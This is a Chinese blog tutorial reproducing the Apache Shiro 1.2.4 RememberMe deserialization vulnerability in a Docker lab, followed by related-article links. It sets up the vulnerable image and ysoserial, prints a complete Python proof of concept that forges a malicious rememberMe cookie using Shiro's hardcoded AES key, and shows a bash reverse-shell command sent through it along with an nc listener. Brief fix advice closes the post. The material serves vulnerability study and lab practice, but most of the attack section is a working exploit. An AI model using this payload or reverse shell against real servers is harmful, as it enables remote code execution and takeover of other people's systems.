shiro RememeberMe 1.2.4反序列化漏洞

最新推荐文章于 2023-03-21 18:29:20 发布
最新推荐文章于 2023-03-21 18:29:20 发布
阅读量1.1k 收藏
点赞数
分类专栏: 中间件漏洞 文章标签: 中间件漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ping_pig/article/details/102558584
版权

shiro简介:

shiro(Java安全框架):apache shiro 是一个强大且易用的java安全框架框架,执行身份验证 、授权、密码和会话管理。使用shiro的易于理解的API,可以快速、轻松的获得任何应用程序,从最小的的移动应用程序到最大的网络和企业应用程序。apache shiro在java的权限及安全验证框架中占有重要的一席之地,在它编号为550的issue中爆出过严重的java反序列化漏洞。下面我来教大家复现这个漏洞。

漏洞描述:

官方issues通告:shiro的issues

产生漏洞的原因:

shiro对rememeberme的cookie做了加密处理,shiro在cookieremembermeManaer类中将cookie中的rememberme字段内容分别进行序列化,aes加密,base64编码操作,在识别身份的时候,需要对cookie里的rememberme字段解密,根据加密的顺序,不难指导解密的顺序为:

  1. 获取rememberme cookie
  2. base64 decode
  3. 解密aes
  4. 反序列化

但是,其中aes加密的密钥key被硬编码在代码里,意味着每个人通过源代码都能拿到aes加密的密钥,因此,攻击者构造一个恶意的对象,并且将其序列化,aes加密,base64编码后,作为cookie的rememberme字段发送,shiro将rememberme进行解密并且反序列化,最终造成了反序列化漏洞。

漏洞复现:

目前有两个复现方式:

1:从GitHub上获取apahce shiro存在漏洞的源代码:

2:使用docker镜像复现

使用docker镜像复现漏洞:

获取docker镜像:

docker pull medicean/vulapps:s_shiro_1

docker run -d -p youport:8080 medicean/vulapps:s_shiro_1

安装ysoserial的jar文件:

git clone https://github.com/frohoff/ysoserial.git *作者更新了,下载的jar包的版本号可能不一样,以下的命令请注意版本号的修改*
cd ysoserial
mvn package -DskipTests cp ysoserial-0.0.5-SNAPSHOT-all.jar /tmp

注意:kali不自带mvn命令,需要自己下载:linux下载mvn命令

然后访问ip地址+youport 环境搭建成功

然后我们开始抓包:

点击account page页面进去后是要求你登录,你选择页面上提示的账号密码登录,记得登录时勾选下方的rememeber选项。店家抓包。

第一个包放过,选择接受返回包,然后将这个页面的数据发送到repter里面

我们的主要目标就是这个里面的cookie里的rememeber参数

poc准备:

*注意ysoserial的版本号,下载的什么版本填什么版本*

下列poc代码复制到本地命名为:shiro_poc.py

# pip install pycrypto
import sys
import base64
import uuid
from random import Random
import subprocess
from Crypto.Cipher import AES

def encode_rememberme(command):
    popen = subprocess.Popen(['java', '-jar', 'ysoserial-0.0.5-SNAPSHOT-all.jar', 'CommonsCollections2', command], stdout=subprocess.PIPE)
    BS   = AES.block_size
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    key  =  "kPH+bIxk5D2deZiIxcaaaA=="
    mode =  AES.MODE_CBC
    iv   =  uuid.uuid4().bytes
    encryptor = AES.new(base64.b64decode(key), mode, iv)
    file_body = pad(popen.stdout.read())
    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
    return base64_ciphertext

if __name__ == '__main__':
    payload = encode_rememberme(sys.argv[1])    
    with open("/tmp/payload.cookie", "w") as fpw:
        print("rememberMe={}".format(payload.decode()), file=fpw)

python3执行该脚本:

使用方式:python3 shiro_poc.py "你的命令"

举例:python3 shiro_poc.py "bash -i >& /dev/tcp you ip/port 0>&1"

然后我们会在执行脚本的目录下发现payload.cookie文件,查看文件复制其中的cookie值到之前抓包的数据包内替换其cookie值。

本地开启nc监听:

nc -lvvp port

反弹shell

 

 

修复方案:

1、升级shiro版本

2、修改文件中硬编码的密钥

Ping_Pig
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Apache shiro1.2.4反序列化漏洞介绍.docx
07-01
Apache shiro1.2.4反序列化漏洞介绍 Apache Shiro是一个Java安全框架,执行身份验证、授权、密码和会话管理。Apache Shiro框架提供了记住我(RememberMe)的功能,关闭了浏览器下次再打开时还是能记住你是谁,下次访问时无需再登录即可访问。
Spring Boot项目Shiro1.7.1版本默认密钥的漏洞
UDWORLD的博客
09-06 2948
Shiro1.7.1版本默认密钥的漏洞
ShiroBase64和MD5加密的使用
BADAO_LIUMANG_QIZHI的博客
05-13 567
场景 Shiro自带Base64和MD5加密Base64位置: MD5位置: 实现 新建测试类 package com.badao.util; import org.apache.shiro.codec.Base64; import org.apache.shiro.crypto.hash.Md5Hash; public class CryptographyUtil ...
Shiro-Base64加密解密,Md5加密
weixin_33968104的博客
11-20 108
Shiro权限框架中自带的加密方式有Base64加密,MD5加密 在Maven项目的pom.xml中添加shiro的依赖: <dependency> <groupId>org.apache.shiro</groupId> <artifactId>shiro-core</artifactId> <...
java反序列化漏洞利用工具_Shiro反序列化漏洞利用汇总
weixin_39637049的博客
11-29 5229
Apache Shiro是一个强大易用的Java安全框架,提供了认证、授权、加密和会话管理等功能。Shiro框架直观、易用,同时也能提供健壮的安全性。1、Shiro rememberMe反序列化漏洞Shiro-550)1.1 漏洞原理1.2 影响版本1.3 漏洞特征1.4 漏洞利用1.4.1 利用方式一:反弹shell1.4.2 利用方式二:写入文件2、Shiro Padding Oracle ...
Shiro权限控制 ---base64加密、MD5加密
太年轻的博客
10-12 5888
在Java中也有MD5加密,现在咱们讲的是Shiro权限控制框架中自带的加密方式,有base64加密、MD5加密 package com.java1234.util; import org.apache.shiro.codec.Base64; import org.apache.shiro.crypto.hash.Md5Hash; public class CryptographyUtil {
java 记住密码 安全_Java 通过 Shiro 配置 RememberMe 实现记住密码功能
weixin_29692851的博客
02-28 561
Apache Shiro是一个强大易用的Java安全框架,提供了认证、授权、加密和会话管理功能,可为任何应用提供安全保障 - 从命令行应用、移动应用到大型网络及企业应用。下面讲述一下如何实现记住密码,一般记住密码就是把用户的基本信息存入浏览器Cookie,下次登录时优先验证Cookie,后端做处理操作,依此来实现记住密码操作,而shiro中自带RememberMe功能,只需简单配置即可。注意:对于...
shiro-550反序列化漏洞
weixin_66717977的博客
03-21 1047
基于docker的shrio反序列化漏洞复现
Shiro RememberMe 反序列化漏洞
hbxf_xs的博客
11-27 1957
Apache Shiro 反序列化漏洞 1)、Apache Shiro框架提供了记住我的功能(RememberMe),用户登陆成功后会生成经过加密并编码的cookie。cookie的key为RememberMe,cookie的值是经过对相关信息进行序列化,然后使用aes加密,最后在使用base64编码处理形成的。 在服务端接收cookie值时,按照如下步骤来解析处理: 1、检索RememberMe cookie 的值 2、Base 64解码 3、使用AES解密(加密密钥硬编码) 4、进行反序列化操作(未作
Shiro记住我(RememberMe)
Hern(宋兆恒)
12-17 5894
简介 Shiro 提供了记住我(RememberMe)的功能,比如访问如淘宝 等一些网站时,关闭了浏览器,下次再打开时还是能记住你是谁, 下次访问时无需再登录即可访问,基本流程如下: • 登录页面选中RememberMe然后登录成功;如果是浏览器登录,一般会把RememberMe 的Cookie写到客户端并保存下来; 关闭浏览器再重新打开;会发现浏览器还是记住你的; 访问一般的网页服务器端...
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen
11-05
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen,里面的 jar 直接运行即可,用于 shiro 漏洞检测、修复验证等
Shiro反序列化漏洞检测工具
01-05
Shiro1.2.4及以下版本存在反序列化漏洞,该工具用于测试该漏洞
shiro反序列化漏洞暴力破解漏洞检测工具
09-14
1.shiro反序列化漏洞、暴力破解漏洞检测工具源码 2.shiro反序列化漏洞、暴力破解漏洞检测工具jar包 3.shiro反序列化漏洞、暴力破解漏洞检测工具启动方法 4.shiro反序列化漏洞、暴力破解漏洞检测工具使用方法 5.shiro...
Shiro反序列化漏洞Shiro版本升级资源
06-22
从上面我们了解到,反序列化漏洞主要是由于硬编码引起的,那么只要解决硬编码,就解决了该漏洞。解决硬编码主要有两种方式: 方法一:自行实现key值 方法二:升级到1.2.5版本或以上 那么在我的项目中,选择的是升级...
浅谈struts2漏洞(检测工具及S2-052漏洞漏洞平台的搭建复现)
Ping_Pig的博客
09-28 4864
简介: struts2是apache项目下的一个web框架,主要应用于各类门户网站,而相对应的漏洞则是从2007年7月23日发布的第一个Struts2漏洞S2-001到2018年的S2-057,跨度还是很多的,以前学习的时候也是听说,基本上Struts每发布一个版本都会存在漏洞,根据Freebuf上的文章显示,漏洞的类型基本上是RCE,XSS,CSRF,DOS,目录遍历和其他功能缺陷漏洞等。风靡...
中间件漏洞之(IIS中间件
Ping_Pig的博客
01-26 4044
IIS服务简介: IIS是是internet infomaition services的缩写,意为互联网信息服务,是全球第三大网络服务器,其中第一是apache,第二是ngin。,iis是由微软公司提供的基于运行Microsoft windows的互联网基本服务。最初是windows nt版本的可选包,随后内置在windows200,windows xp professional和window...
cve2019-2725复现
Ping_Pig的博客
11-19 2017
漏洞存在于异步通讯服务,可通过访问路径/_async/AsyncResponseService,判断不安全组件是否开启 docker搭建环境: docker pull ismaleiva90/weblogic12 docker run -d -p 49163:7001 -p 49164:7002 -p 49165:5556 ismaleiva90/weblogic12:latest ...
Apache Solr Velocity模板注入RCE漏洞复现
Ping_Pig的博客
10-31 1379
Solr简介: Solr是一个独立的企业级搜索应用服务器,它对外提供类似于web-service的API接口,用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引,也可以通过Http Get操作提出查找请求,并得到XML格式的返回结果。 漏洞概述 近日,国外安全研究员s00py公开了一个Apache Solr的Velocity模板注入的漏洞.该漏洞可以攻击最新版本的S...
Apache Shiro 1.2.4反序列化漏洞
最新发布
07-27
Apache Shiro 1.2.4版本之前存在一个反序列化漏洞。在这个版本之前,默认的ASE密钥是固定的,这意味着攻击者可以直接反序列化执行恶意代码。然而,在1.2.4版本之后,ASE密钥不再是默认的,需要获取到密钥才能进行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值